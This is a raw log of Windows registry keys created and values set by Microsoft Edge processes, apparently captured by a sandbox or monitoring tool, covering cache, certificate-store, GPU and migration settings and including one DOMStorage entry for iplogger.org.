\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{E3F848AB-B52A-4021-9353-C7812EE4CE62} = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000003efca3960822f5bfb09c6c43cb6875e56650fdb99cb5ae0ced312f63fbb89ff5c72f68b773a7f0157eac21a11417ee571b4de674e824e3a007d4 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = f775015455bfd601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates\5FF1348C80820F2A9 = 0300000001000000140000005ff1348c80820f2a988d0c0c7abea0ea394b5e6c040000000100000010000000fd42404f68fae3f0d490e8d19d08ab1d0f00000001000000200000005546bb2210de2560292e6f4610af4ffbdb453f9bf9983e62942c35959e16038d140000000100000014000000b3b30880146b0eb235e8e136e7d15c9c4847f5f3190000000100000010000000e142e209d34bfb2eac257eb76a2b61e15c0000000100000004000000000800001800000001000000100000002d581a49c8eb5b3b3c6ef9bb65314d702000000001000000e5050000308205e1308203c9a0030201020213330000016fd585f24b93e88a0700000000016f300d06092a864886f70d01010b0500307e310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e312830260603550403131f4d6963726f736f667420536563757265205365727665722043412032303131301e170d3139313231323030303333315a170d3231303331323030303333315a3081a3310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e310d300b060355040b130442696e67311b301906035504031312494520496e737472756d656e746174696f6e3121301f06092a864886f70d010901161271666265406d6963726f736f66742e636f6d30820122300d06092a864886f70d01010105000382010f003082010a0282010100cfb24782c35c66c63688c01ed857df9a4330b81628c86831de4d577f8cb2155b880ee41953a18ac28de644bacfa97558ec6f522490f103b7fa0092430f8e0ba55c36dd91f6f1f91baec6eb3581d89133141e1580e02ec2445e5380b178f92f81e97193be8be1223d36e5f2be070a3db6ac17987ea3b42d15994c73a10e64794da4660a5d875e179c567bb06ecfd7cbf4c1ee4fe453284e72877d746a3e178788a1bd540ba9250a931a11105bb98f1b2b757fa6c5ade16e7cc1d1628fedb716018526f5b56630b54cd5f75f938e9b4a956609cc441aac84a10a101f6429b6fceb9434a41b24f0ca9781bf72b010f14bd13dc5d996b6ed6c4d53156969dd04f7390203010001a38201303082012c300e0603551d0f0101ff0404030204f030150603551d25040e300c060a2b0601040182374c0c01301d0603551d0e04160414b3b30880146b0eb235e8e136e7d15c9c4847f5f3301f0603551d230418301680143656896549cb5b9b2f3cac4216504d91b933d79130530603551d1f044c304a3048a046a0448642687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b696f70732f63726c2f4d69635365635365724341323031315f323031312d31302d31382e63726c306006082b0601050507010104543052305006082b060105050730028644687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b696f70732f63657274732f4d69635365635365724341323031315f323031312d31302d31382e637274300c0603551d130101ff04023000300d06092a864886f70d01010b0500038202010064d81278e224099c122690412271d5f2d92ae1c00f7135d64f63663ccc0588826bf24cc6cffa0d6666b7e3f989825dd1021fd1bdc6a9d4a492c0f46198534382204d8668b0f3c8d85f9f614f7fff47e391a4fdc89dba1b423f1d2a8d4986ff42bac032a21224b246b03ffef26e7da49d3ef381ff9d669cda0234445bff395be1b70627f013ccde692280d75d690b4f4c5e3a123b379bd30bdc6cf1af0c69d97eb0aa4f580eb4e876465b2c62514a612a3971f6bc6ace33f569e0cbcbd5498caf2af949952c310221a382d0a7fbc4594b0bfe96a1c81d26639b249beea28179ead8377bf70e9a09596997af2b405c5425a1e5e6e46b065016901b7cd120e2389d47924b1f834955135461f7592c9487e3910bf0de382ad5906dd8c46b321b176698caaec19d1ee10aa6679981d8f2f5c40d69240a7075ce4341305d2bbd082e03c81c41baeb557b41904482ae88d0566f339ab517ae2f84223d567f9ec734c1c5a2be39aa24c49930b6428bbe2fa300f2369e1c8cc554c14010f1ee518afa32e4bf0a15cb251d37791338f5ade8ced4b67ca5fc56320c2c2973f9b13e250dabe4a373580becf787afd552c6b293dfc7bfb1f67739c64df74ae3d373e2db9c27090fe15e58591824e4f150602af628917a6d1353919cd0a8489596f97070833a98b34c2d3a0ebafda2f81096533b773c5914d7f05e66cb17af2bcd11ad517440b5 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpCleanupState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\Certificates MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileNextUpdateDate = "312653867" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\trust\Certificates MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Process not Found Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\iplogger.org\ = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\NextUpdateDate = "312668405" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileCountryCode = "US" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Disallowed\Certific MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\TrustedPeople MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = a5429d6e55bfd601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Process not Found Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\NextPromptBuild = "15063" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Disallowed MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CTLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileVersion = "10" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = 